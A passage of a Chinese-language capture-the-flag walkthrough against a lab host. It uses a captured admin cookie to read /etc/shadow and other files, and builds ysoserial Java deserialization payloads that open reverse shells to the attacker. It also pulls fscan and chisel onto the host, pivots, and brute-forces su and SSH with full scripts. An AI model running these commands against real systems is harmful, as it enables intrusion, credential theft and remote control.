\u590d\u5236\u7c98\u8d34\u5230\u53e6\u4e00\u4e2a\u6587\u4ef6\u5185\uff0c\u91cd\u65b0\u6267\u884c\u811a\u672c\uff1a<\/p>\n
pwn@ubuntu:~\/temp\/yulian\/result$ ls -la temp1\n-rw-rw-r-- 1 pwn pwn 752 Jan 17 06:25 temp1\npwn@ubuntu:~\/temp\/yulian\/result$ cat -A temp1\n\/etc\/passwd$\n\/etc\/shadow$\n\/etc\/hosts$\n\/etc\/motd$\n\/etc\/mtab$\n\/etc\/issue$\n\/etc\/resolv.conf$\n\/etc\/fstab$\n\/etc\/profile$\n\/etc\/inittab$\n\/proc\/filesystems$<\/code><\/pre>\n
\u5148\u5220\u9664\u4e00\u4e9b\u6ca1\u5fc5\u8981\u67e5\u770b\u7684\u6587\u4ef6\uff0c\u6bd4\u5982\/proc\/self\/fd<\/code>\uff0c\u6267\u884c\u811a\u672c\uff0c\u53d1\u73b0\u5f97\u5230\u4e86\u76ee\u6807\u5185\u5bb9\uff01\uff01\uff01\uff01<\/p>\n
while read -r path; do curl -s "http:\/\/192.168.64.4:8080\/download?file=$path" -H 'Cookie:auth=admin:S+jYmswX8+Lnl8Y+X7auaMMN5AHvFyKZMJluN\/qPCFI=' > $(basename $path); done < ..\/temp1<\/code><\/pre>\n
ai\u5199\u7684\u811a\u672c\u4e5f\u53ef\u4ee5\u8fd0\u884c\uff1a<\/p>\n
#!\/bin\/bash\n\n# \u914d\u7f6e\u53c2\u6570\uff08\u6839\u636e\u5b9e\u9645\u60c5\u51b5\u4fee\u6539\uff09\nIP="192.168.64.4"\nPORT="8080"\nCOOKIE="auth=admin:S+jYmswX8+Lnl8Y+X7auaMMN5AHvFyKZMJluN\/qPCFI="\n\n# \u68c0\u67e5\u5fc5\u8981\u5de5\u5177\nif ! command -v curl &> \/dev\/null; then\n    echo "\u9519\u8bef: \u9700\u8981\u5b89\u88c5 curl \u5de5\u5177"\n    exit 1\nfi\n\n# \u8bfb\u53d6\u6587\u4ef6\u8def\u5f84\u5217\u8868\uff08\u786e\u4fdd temp1 \u6587\u4ef6\u5b58\u5728\uff09\nif [ ! -f temp1 ]; then\n    echo "\u9519\u8bef: \u6587\u4ef6 temp1 \u4e0d\u5b58\u5728\uff0c\u8bf7\u5148\u63d0\u53d6\u6587\u4ef6\u8def\u5f84"\n    exit 1\nfi\n\n# \u5f00\u59cb\u5904\u7406\necho -e "\\n\\033[1;34m===== \u5f00\u59cb\u63d0\u53d6\u6587\u4ef6\u5185\u5bb9\uff08\u7f8e\u5316\u8f93\u51fa\uff09 =====\\033[0m\\n"\n\nwhile IFS= read -r file_path; do\n    # \u8df3\u8fc7\u7a7a\u884c\n    [ -z "$file_path" ] && continue\n\n    # \u6784\u9020\u5b89\u5168\u7684 URL (\u81ea\u52a8\u5904\u7406\u7279\u6b8a\u5b57\u7b26)\n    url="http:\/\/$IP:$PORT\/download"\n    echo -e "\\033[1;32m[+] \u6b63\u5728\u83b7\u53d6: \\033[0m$file_path"\n\n    # \u4f7f\u7528 curl \u83b7\u53d6\u5185\u5bb9 (\u81ea\u52a8 URL \u7f16\u7801)\n    response=$(curl -s -G -H "Cookie: $COOKIE" --data-urlencode "file=$file_path" "$url")\n    exit_code=$?\n\n    # \u68c0\u67e5\u8bf7\u6c42\u72b6\u6001\n    if [ $exit_code -ne 0 ]; then\n        echo -e "\\033[1;31m[!] \u8bf7\u6c42\u5931\u8d25 (\u72b6\u6001: $exit_code)\\033[0m"\n        echo -e "========================================\\n"\n        continue\n    fi\n\n    # \u68c0\u67e5\u5185\u5bb9\u5927\u5c0f (\u907f\u514d\u8fc7\u5927\u6587\u4ef6)\n    size=$(echo -n "$response" | wc -c)\n    echo -e "\\033[1;36m[+] \u6587\u4ef6\u5927\u5c0f: $size \u5b57\u8282\\033[0m"\n\n    # \u7f8e\u5316\u8f93\u51fa (\u6dfb\u52a0\u5206\u9694\u7ebf\u548c\u6587\u4ef6\u540d)\n    echo -e "\\n\\033[1;33m===== \u6587\u4ef6\u5185\u5bb9: $file_path =====\\033[0m"\n    echo -e "$response"\n    echo -e "\\033[1;33m========================================\\033[0m\\n"\n\ndone < temp1\n\necho -e "\\n\\033[1;34m===== \u6240\u6709\u6587\u4ef6\u63d0\u53d6\u5b8c\u6210! =====\\033[0m"<\/code><\/pre>\n
\u786e\u5b9e\u7f8e\u4e00\u70b9\u8bf6\uff0c\u563f\u563f\uff0c\u67e5\u770b\u6587\u4ef6\u5185\u5bb9\uff0c\u53d1\u73b0\uff1a<\/p>\n
pwn@ubuntu:~\/temp\/yulian$ cat temp_result | grep -A 3 \/proc\/self\/cmdline\n[+] \u6b63\u5728\u83b7\u53d6: \/proc\/self\/cmdline\n[+] \u6587\u4ef6\u5927\u5c0f: 37 \u5b57\u8282\n\n===== \u6587\u4ef6\u5185\u5bb9: \/proc\/self\/cmdline =====\njava-jarjavaserver-0.0.1-SNAPSHOT.jar\n========================================<\/code><\/pre>\n
\u662f\u4e00\u4e2a java \u670d\u52a1\u5668\uff1a<\/p>\n
\"image-20260117145342310\"<\/div><\/p>\n
\"image-20260117145422779\"<\/div><\/p>\n
\u53ef\u80fd\u5927\u6982\u662f\u4e00\u6837\u7684\u5427\uff1f\u5c1d\u8bd5\u4e0b\u8f7d\u8fd9\u4e2a\u6587\u4ef6\uff1a<\/p>\n
pwn@ubuntu:~\/temp\/yulian$ cat temp_result | grep java\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/usr\/lib\/jvm\/java-1.8-openjdk\/jre\/bin:\/usr\/lib\/jvm\/java-1.8-openjdk\/binHOSTNAME=3debe9b825c8LANG=C.UTF-8JAVA_HOME=\/usr\/lib\/jvm\/java-1.8-openjdkJAVA_VERSION=8u212JAVA_ALPINE_VERSION=8.212.04-r0HOME=\/rootLD_LIBRARY_PATH=\/usr\/lib\/jvm\/java-1.8-openjdk\/jre\/lib\/amd64\/server:\/usr\/lib\/jvm\/java-1.8-openjdk\/jre\/lib\/amd64:\/usr\/lib\/jvm\/java-1.8-openjdk\/jre\/..\/lib\/amd64\nName:   java\njava-jarjavaserver-0.0.1-SNAPSHOT.jar\n1 (java) S 0 1 1 0 -1 4194560 385249 0 75 0 125278 97271 0 0 20 0 47 0 4064 2063429632 45923 18446744073709551615 93865608224768 93865608225298 140729829223344 0 0 0 0 0 16800975 0 0 0 17 0 0 0 0 0 0 93865608236416 93865608237064 93866196692992 140729829223924 140729829223964 140729829223964 140729829224397 0\npwn@ubuntu:~\/temp\/yulian$ curl -s "http:\/\/192.168.64.4:8080\/download?file=javaserver-0.0.1-SNAPSHOT.jar" -H 'Cookie:auth=admin:S+jYmswX8+Lnl8Y+X7auaMMN5AHvFyKZMJluN\/qPCFI=' > javaserver.jar\npwn@ubuntu:~\/temp\/yulian$ file javaserver.jar\njavaserver.jar: Java archive data (JAR)\npwn@ubuntu:~\/temp\/yulian$ ls -la\ntotal 17060\ndrwxrwxr-x 3 pwn pwn     4096 Jan 17 08:26 .\ndrwxrwxr-x 3 pwn pwn     4096 Jan 10 07:54 ..\n-rwxrwxr-x 1 pwn pwn     1630 Jan 17 06:37 ai.sh\n-rwxrwxr-x 1 pwn pwn    16032 Jan 10 08:22 a.out\n-rw-rw-r-- 1 pwn pwn 17372377 Jan 17 08:26 javaserver.jar\n-rw-rw-r-- 1 pwn pwn      278 Jan 10 08:21 knock.c\ndrwxrwxr-x 2 pwn pwn     4096 Jan 17 06:39 result\n-rw-rw-r-- 1 pwn pwn     4738 Jan 17 05:30 temp\n-rw-rw-r-- 1 pwn pwn      555 Jan 17 06:41 temp1\n-rw-rw-r-- 1 pwn pwn    43331 Jan 17 06:45 temp_result<\/code><\/pre>\n
\u53d1\u73b0\u4e0b\u8f7d\u4e0b\u6765\u4e86\uff0c\u53f3\u952e\u6dfb\u52a0\u4e3a\u5e93\uff0c\u770b\u4e00\u4e0b\u5565\u60c5\u51b5\uff1a<\/p>\n
\"image-20260117163405013\"<\/div><\/p>\n
\u63a5\u4e0b\u6765\u6211\u5c31\u65e0\u80fd\u4e3a\u529b\u4e86\uff0c\u6211\u770b\u4f3c\u4e4e\u9700\u8981\u8fdb\u884c\u4ee3\u7801\u5ba1\u8ba1\uff0c\u56e0\u4e3a\u6709\u4e00\u4e2a\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u3002\u3002\u3002\u3002\u3002<\/p>\n
\n
https:\/\/book.hacktricks.wiki\/zh\/pentesting-web\/deserialization\/index.html?highlight=java#java---http<\/a><\/p>\n
https:\/\/github.com\/GrrrDog\/Java-Deserialization-Cheat-Sheet#genson-json<\/a><\/p>\n<\/blockquote>\n
\"image-20260117170018843\"<\/div><\/p>\n
\u6ce8\u610f\u5230commons-collections<\/code>\u662f\u4e00\u4e2a\u5e38\u88ab\u5229\u7528\u7684\u5e93\uff0c\u7136\u540e\u770b\u5e08\u5085\u4eec\u7684blog\u53d1\u73b0\u4f7f\u7528\u7684\u662fcc5\uff0c\u5c1d\u8bd5\u4f7f\u7528ysoserial<\/code>\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n
\"image-20260118131542656\"<\/div><\/p>\n
# sudo apt install openjdk-8-jdk\n# echo 'nc -e \/bin\/bash 192.168.64.3' | base64\n# bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNjQuMwo=\npwn@ubuntu:~\/temp\/yulian$ java -jar ..\/..\/tools\/ysoserial-all.jar CommonsCollections5 "bash -c {echo,bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNjQuMwo=}|{base64,-d}|{bash,-i}" > payload.bin\ncurl -s "http:\/\/192.168.64.4:8080\/deserialize" -H 'Cookie:auth=admin:S+jYmswX8+Lnl8Y+X7auaMMN5AHvFyKZMJluN\/qPCFI=' -X POST --data-binary @payload.bin<\/code><\/pre>\n
\u4f46\u662f\u4f3c\u4e4e\u65e0\u6548\uff0c\u5c1d\u8bd5\u4f7f\u7528\u522b\u7684\u529e\u6cd5\u8fdb\u884c\u6d4b\u8bd5\uff1a<\/p>\n
# echo '\/bin\/bash -i >& \/dev\/tcp\/192.168.64.3\/1234 0>&1' | base64\n# L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNjQuMy8xMjM0IDA+JjEK\njava -jar ..\/..\/tools\/ysoserial-all.jar CommonsCollections5 "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNjQuMy8xMjM0IDA+JjEK}|{base64,-d}|{bash,-i}" > payload.bin\ncurl -s "http:\/\/192.168.64.4:8080\/deserialize" -H 'Cookie:auth=admin:S+jYmswX8+Lnl8Y+X7auaMMN5AHvFyKZMJluN\/qPCFI=' -H "Content-Type: application\/octet-stream" -X POST --data-binary @payload.bin <\/code><\/pre>\n
\"image-20260118132024555\"<\/div><\/p>\n
\u8fd9\u91cc\u56de\u4f20\u7528\u5230\u7684\u662f\u4e00\u4e2a\u53ebpenelope<\/a>\u7684\u5f00\u6e90\u9879\u76ee\uff0c\u662f\u5728Pepster<\/code>\u5e08\u5085\u7684blog\u770b\u5230\u7684\uff0c\u6b63\u597d\u7528\u6765\u66ff\u4ee3\u4e0d\u518d\u7ef4\u62a4\u7684pwncat-cs<\/code>\uff01<\/p>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
bash-4.4# whoami;id;echo $SHELL\nwhoami;id;echo $SHELL\nroot\nuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)\n\/bin\/ash<\/code><\/pre>\n
\u7a33\u5b9ashell\u3002\u3002\u3002\u3002\u3002<\/p>\n
python3 -c 'import pty;pty.spawn("\/bin\/bash")'\nexport TERM=xterm\nCtrl + Z\nstty raw -echo; fg\n# stty size\nstty rows 38 columns 116<\/code><\/pre>\n
\u4f46\u662f\u53d1\u73b0\u6ca1\u6709python\u73af\u5883\u8bf6\uff0c\u53ef\u80fd\u662f\u4e00\u4e2a\u5bb9\u5668\uff0c\u770b\u4e00\u4e0b\u5176\u4ed6\u4fe1\u606f\uff0c\u4e0a\u4f20fscan\u8fdb\u884c\u4fe1\u606f\u6536\u96c6\uff1a<\/p>\n
# terminal1\npwn@ubuntu:~\/temp$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.64.4 - - [18\/Jan\/2026 05:29:54] "GET \/fscan HTTP\/1.1" 200 -\n# terminal2\nbash-4.4# ip a\nip a\n1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000\n    link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\/8 scope host lo\n       valid_lft forever preferred_lft forever\n6: eth0@if7: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1500 qdisc noqueue state UP\n    link\/ether 02:42:ac:11:00:03 brd ff:ff:ff:ff:ff:ff\n    inet 172.17.0.3\/16 brd 172.17.255.255 scope global eth0\n       valid_lft forever preferred_lft forever\nbash-4.4# pwd\npwd\n\/tmp\nbash-4.4# wget http:\/\/192.168.64.3:8888\/fscan\nwget http:\/\/192.168.64.3:8888\/fscan\nConnecting to 192.168.64.3:8888 (192.168.64.3:8888)\nfscan                100% |********************************| 6933k  0:00:00 ETA\n\nbash-4.4# chmod +x fscan\nchmod +x fscan\nbash-4.4# .\/fscan -h 172.17.0.3\/16\n.\/fscan -h 172.17.0.3\/16\n\n   ___                              _\n  \/ _ \\     ___  ___ _ __ __ _  ___| | __\n \/ \/_\\\/____\/ __|\/ __| '__\/ _` |\/ __| |\/ \/\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__|   <\n\\____\/     |___\/\\___|_|  \\__,_|\\___|_|\\_\\\n                     fscan version: 1.8.4\nstart infoscan\n(icmp) Target 172.17.0.1      is alive\n(icmp) Target 172.17.0.2      is alive\n(icmp) Target 172.17.0.3      is alive\n[*] LiveTop 172.17.0.0\/16    \u6bb5\u5b58\u6d3b\u6570\u91cf\u4e3a: 3\n[*] LiveTop 172.17.0.0\/24    \u6bb5\u5b58\u6d3b\u6570\u91cf\u4e3a: 3\n[*] Icmp alive hosts len is: 3\n172.17.0.2:22 open\n172.17.0.1:22 open\n172.17.0.2:80 open\n172.17.0.1:80 open\n172.17.0.1:8080 open\n172.17.0.3:8080 open\n[*] alive ports len is: 6\nstart vulscan\n[*] WebTitle http:\/\/172.17.0.1         code:200 len:6047   title:Linux Terminal Simulator\n[*] WebTitle http:\/\/172.17.0.2         code:200 len:3038   title:Introduction to Brute Force Attacks\n[*] WebTitle http:\/\/172.17.0.3:8080    code:302 len:0      title:None \u8df3\u8f6curl: http:\/\/172.17.0.3:8080\/login.html\n[*] WebTitle http:\/\/172.17.0.1:8080    code:302 len:0      title:None \u8df3\u8f6curl: http:\/\/172.17.0.1:8080\/login.html\n[*] WebTitle http:\/\/172.17.0.3:8080\/login.html code:200 len:2270   title:Login\n[*] WebTitle http:\/\/172.17.0.1:8080\/login.html code:200 len:2270   title:Login\n\u5df2\u5b8c\u6210 6\/6<\/code><\/pre>\n
\u53d1\u73b0\u6709\u4e00\u4e2a\u7206\u7834\u73af\u5883\uff0c\u770b\u4e00\u4e0b\u662f\u4e2a\u5565\u60c5\u51b5\uff1a<\/p>\n
bash-4.4# curl -s http:\/\/172.17.0.2\ncurl -s http:\/\/172.17.0.2\n<!DOCTYPE html>\n<html lang="en">\n<head>\n  <meta charset="UTF-8">\n  <title>Introduction to Brute Force Attacks<\/title>\n  <style>\n    body {\n      font-family: "Microsoft YaHei", sans-serif;\n      background: #f5f7fa;\n      color: #333;\n      margin: 0;\n      padding: 0;\n    }\n\n    header {\n      background-color: #2c3e50;\n      color: white;\n      padding: 20px;\n      text-align: center;\n    }\n\n    main {\n      max-width: 800px;\n      margin: 30px auto;\n      padding: 20px;\n      background: white;\n      box-shadow: 0 0 10px rgba(0,0,0,0.1);\n      border-radius: 8px;\n    }\n\n    h2 {\n      color: #2c3e50;\n      border-bottom: 2px solid #ecf0f1;\n      padding-bottom: 5px;\n    }\n\n    ul {\n      margin-left: 20px;\n    }\n\n    code {\n      background: #ecf0f1;\n      padding: 2px 5px;\n      border-radius: 4px;\n    }\n\n    footer {\n      text-align: center;\n      padding: 15px;\n      color: #888;\n      font-size: 14px;\n    }\n  <\/style>\n<\/head>\n<body>\n  <header>\n    <h1>Introduction to Brute Force Attacks<\/h1>\n  <\/header>\n\n  <main>\n    <h2>What is a Brute Force Attack?<\/h2>\n    <p>A brute force attack is a method of trial and error used to crack passwords or encryption keys by systematically trying every possible combination until the correct one is found.<\/p>\n\n    <h2>Common Types of Brute Force Attacks<\/h2>\n    <ul>\n      <li><strong>Pure Brute Force<\/strong>: Trying every combination from <code>aaaa<\/code> to <code>zzzz<\/code>.<\/li>\n      <li><strong>Dictionary Attack<\/strong>: Using a list of common passwords to guess the correct one.<\/li>\n      <li><strong>Hybrid Attack<\/strong>: Combining dictionary words with common variations (e.g., adding 123, changing letter cases, etc.).<\/li>\n    <\/ul>\n\n    <h2>Characteristics of Brute Force Attacks<\/h2>\n    <ul>\n      <li>Does not rely on software vulnerabilities, only on guess attempts.<\/li>\n      <li>Time-consuming, complexity increases exponentially with password length and character set.<\/li>\n      <li>Can be automated using tools such as Python scripts, Hydra, John the Ripper, etc.<\/li>\n    <\/ul>\n\n    <h2>Defense Against Brute Force Attacks<\/h2>\n    <ul>\n      <li>Implement <strong>account lockout<\/strong> policies, such as locking the account after 5 failed attempts.<\/li>\n      <li>Use <strong>CAPTCHA<\/strong> to block automated scripts.<\/li>\n      <li>Limit <strong>login rate<\/strong>, for example, allow only 3 attempts every 5 minutes.<\/li>\n      <li>Enforce <strong>strong passwords<\/strong> (long and complex).<\/li>\n      <li>Monitor login activity and detect abnormal login attempts.<\/li>\n    <\/ul>\n\n    <h2>Legal Use and Warning<\/h2>\n    <p>Brute force techniques can be used for penetration testing and security audits, but unauthorized use is illegal. Always follow applicable laws and regulations.<\/p>\n  <\/main>\n  <!--500-worst-passwords-->\n  <footer>\n    © 2025 Cybersecurity Learning Page | For educational use only\n  <\/footer>\n<\/body>\n<\/html><\/code><\/pre>\n
\u7206\u7834ssh<\/h3>\n
\u672c\u5730\u6e32\u67d3\u4e00\u4e0b\u770b\u770b\uff1a<\/p>\n
\"12138\"<\/div><\/p>\n
\u770b\u6765\u4e0d\u7528\u8fdb\u884c\u7aef\u53e3\u8f6c\u53d1\u4e86\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\u91cc\u7684\u6ce8\u89c6\u5173\u952e\u5b57\uff1a<\/p>\n
\"image-20260118134905572\"<\/div><\/p>\n
\u4e0b\u8f7d\u4e0b\u6765\u5c1d\u8bd5\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n
#!\/bin\/bash\n\nhelp="This tool bruteforces a selected user using binary su and as passwords: null password, username, reverse username and a wordlist (top12000.txt).\nYou can specify a username using -u <username> and a wordlist via -w <wordlist>.\nBy default the BF default speed is using 100 su processes at the same time (each su try last 0.7s and a new su try in 0.007s) ~ 143s to complete\nYou can configure this times using -t (timeout su process) ans -s (sleep between 2 su processes).\nFastest recommendation: -t 0.5 (minimun acceptable) and -s 0.003 ~ 108s to complete\n\nExample:    .\/suBF.sh -u <USERNAME> [-w top12000.txt] [-t 0.7] [-s 0.007]\n\nTHE USERNAME IS CASE SENSITIVE AND THIS SCRIPT DOES NOT CHECK IF THE PROVIDED USERNAME EXIST, BE CAREFUL\\n\\n"\n\nWORDLIST="top12000.txt"\nUSER=""\nTIMEOUTPROC="0.7"\nSLEEPPROC="0.007"\nwhile getopts "h?u:t:s:w:" opt; do\n  case "$opt" in\n    h|\\?) printf "$help"; exit 0;;\n    u)  USER=$OPTARG;;\n    t)  TIMEOUTPROC=$OPTARG;;\n    s)  SLEEPPROC=$OPTARG;;\n    w)  WORDLIST=$OPTARG;;\n    esac\ndone\n\nif ! [ "$USER" ]; then printf "$help"; exit 0; fi\n\nif ! [[ -p \/dev\/stdin ]] && ! [ $WORDLIST = "-" ] && ! [ -f "$WORDLIST" ]; then echo "Wordlist ($WORDLIST) not found!"; exit 0; fi\n\nC=$(printf '\\033')\n\nsu_try_pwd (){\n  USER=$1\n  PASSWORDTRY=$2\n  trysu=`echo "$PASSWORDTRY" | timeout $TIMEOUTPROC su $USER -c whoami 2>\/dev\/null` \n  if [ "$trysu" ]; then\n    echo "  You can login as $USER using password: $PASSWORDTRY" | sed "s,.*,${C}[1;31;103m&${C}[0m,"\n    exit 0;\n  fi\n}\n\nsu_brute_user_num (){\n  echo "  [+] Bruteforcing $1..."\n  USER=$1\n  su_try_pwd $USER "" &    #Try without password\n  su_try_pwd $USER $USER & #Try username as password\n  su_try_pwd $USER `echo $USER | rev 2>\/dev\/null` &     #Try reverse username as password\n\n  if ! [[ -p \/dev\/stdin ]] && [ -f "$WORDLIST" ]; then\n    while IFS='' read -r P || [ -n "${P}" ]; do # Loop through wordlist file   \n      su_try_pwd $USER $P & #Try TOP TRIES of passwords (by default 2000)\n      sleep $SLEEPPROC # To not overload the system\n    done < $WORDLIST\n\n  else\n    cat - | while read line; do\n      su_try_pwd $USER $line & #Try TOP TRIES of passwords (by default 2000)    \n      sleep $SLEEPPROC # To not overload the system\n    done\n  fi\n  wait\n}\n\nsu_brute_user_num $USER\necho "  Wordlist exhausted" | sed "s,.*,${C}[1;31;107m&${C}[0m,"<\/code><\/pre>\n
\"image-20260118140249849\"<\/div><\/p>\n
\u53d1\u73b0\u7206\u7834\u5931\u8d25\uff0c\u5f97\u5c1d\u8bd5\u5176\u4ed6\u65b9\u6cd5\uff0c\u6ce8\u610f\u5230\u76ee\u6807\u7f51\u7ad9172.17.0.2<\/code>\u5f00\u542f\u4e8622<\/code>\u7aef\u53e3\uff0c\u5f97\u5c1d\u8bd5\u8fdb\u884cssh\u7206\u7834\uff01<\/p>\n
\u7531\u4e8efscan\u4e0d\u63a5\u53d7\u6307\u5b9a\u5b57\u5178\u8fdb\u884c\u7206\u7834\uff0c\u6545\u5f97\u8fdb\u884c\u8f6c\u53d1\uff0c\u53c8\u7531\u4e8e\u65e0ssh\u8fde\u63a5\uff0c\u6240\u4ee5\u65e0\u6cd5\u4f7f\u7528ssh\u547d\u4ee4\u8fdb\u884c\u8f6c\u53d1\uff0c\u8fd9\u91cc\u4f7f\u7528\u4e00\u4e2a\u540d\u4e3achesel\u7684\u5de5\u5177\u8fdb\u884c\u8f6c\u53d1\uff01\uff08\u6216\u8005socat\u4e5f\u884c\uff09<\/p>\n
bash-4.4# wget http:\/\/192.168.64.3:8888\/chisel; chmod +x $_<\/code><\/pre>\n
# terminal1\nchisel server --port 9000 --reverse\n# terminal2\n.\/chisel client 192.168.64.3:9000 R:2222:172.17.0.2:22\n# terminal3\nhydra -L user -P pass ssh:\/\/127.0.0.1:2222 -t 4 -vV<\/code><\/pre>\n
\"image-20260118150010514\"<\/div><\/p>\n
\u5c1d\u8bd5\u8fdb\u884c\u8fde\u63a5\uff1a<\/p>\n
\"image-20260118150538588\"<\/div><\/p>\n
\u5bc6\u7801\u5b66\u3002\u3002\u3002\u3002<\/h3>\n
\u672c\u6765\u4ee5\u4e3a\u5df2\u7ecf\u7ed3\u675f\u4e86\uff0c\u4f46\u662f\u53d1\u73b0\uff1a<\/p>\n
6ab28be27b0c:~# ls -la\ntotal 8\ndrwx------    1 root     root          4096 Jun 29  2025 .\ndrwxr-xr-x    1 root     root          4096 Jun 24  2025 ..\nlrwxrwxrwx    1 root     root             9 Jun 29  2025 .ash_history -> \/dev\/null<\/code><\/pre>\n
\u4e0d\u5bf9\u52b2\uff0c\u5341\u5206\u6709\u5341\u4e8c\u5206\u7684\u4e0d\u5bf9\u52b2\uff0c\u770b\u4e00\u4e0b\u6709\u6df1\u58a8\u4e1c\u897f\uff1a<\/p>\n
6ab28be27b0c:~# cd ..\n6ab28be27b0c:\/# ls -la\ntotal 84\ndrwxr-xr-x    1 root     root          4096 Jun 24  2025 .\ndrwxr-xr-x    1 root     root          4096 Jun 24  2025 ..\n-rwxr-xr-x    1 root     root             0 Jun 24  2025 .dockerenv\ndrwxr-xr-x    1 root     root          4096 Jun 24  2025 bin\ndrwxr-xr-x    5 root     root           320 Jan 10 04:21 dev\ndrwxr-xr-x    1 root     root          4096 Jun 24  2025 etc\ndrwxr-xr-x    2 root     root          4096 May 30  2025 home\ndrwxr-xr-x    1 root     root          4096 May 30  2025 lib\ndrwxr-xr-x    5 root     root          4096 May 30  2025 media\ndrwxr-xr-x    2 root     root          4096 May 30  2025 mnt\ndrwxr-xr-x    2 root     root          4096 May 30  2025 opt\ndr-xr-xr-x 1662 root     root             0 Jan 10 04:21 proc\ndrwx------    1 root     root          4096 Jun 29  2025 root\ndrwxr-xr-x    1 root     root          4096 Jan 10 04:17 run\ndrwxr-xr-x    2 root     root          4096 May 30  2025 sbin\ndrwxr-xr-x    2 root     root          4096 May 30  2025 srv\ndr-xr-xr-x   13 root     root             0 Jan 10 04:21 sys\ndrwxrwxrwt    2 root     root          4096 May 30  2025 tmp\ndrwxr-xr-x    1 root     root          4096 May 30  2025 usr\ndrwxr-xr-x    1 root     root          4096 Jun 24  2025 var<\/code><\/pre>\n
\u88c5\u90fd\u4e0d\u88c5\u4e86\uff0c\u770b\u770b\u5565\u60c5\u51b5\uff1a<\/p>\n
6ab28be27b0c:\/bin# ls -la\ntotal 1540\ndrwxr-xr-x    1 root     root          4096 Jun 24  2025 .\ndrwxr-xr-x    1 root     root          4096 Jun 24  2025 ..\nlrwxrwxrwx    1 root     root            12 May 30  2025 arch -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 ash -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 base64 -> \/bin\/busybox\n-rwxr-xr-x    1 root     root        756384 Sep 24  2024 bash\nlrwxrwxrwx    1 root     root            12 May 30  2025 bbconfig -> \/bin\/busybox\n-rwxr-xr-x    1 root     root        808712 May 26  2025 busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 cat -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 chattr -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 chgrp -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 chmod -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 chown -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 cp -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 date -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 dd -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 df -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 dmesg -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 dnsdomainname -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 dumpkmap -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 echo -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 egrep -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 false -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 fatattr -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 fdflush -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 fgrep -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 fsync -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 getopt -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 grep -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 gunzip -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 gzip -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 hostname -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 ionice -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 iostat -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 ipcalc -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 kbd_mode -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 kill -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 link -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 linux32 -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 linux64 -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 ln -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 login -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 ls -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 lsattr -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 lzop -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 makemime -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 mkdir -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 mknod -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 mktemp -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 more -> 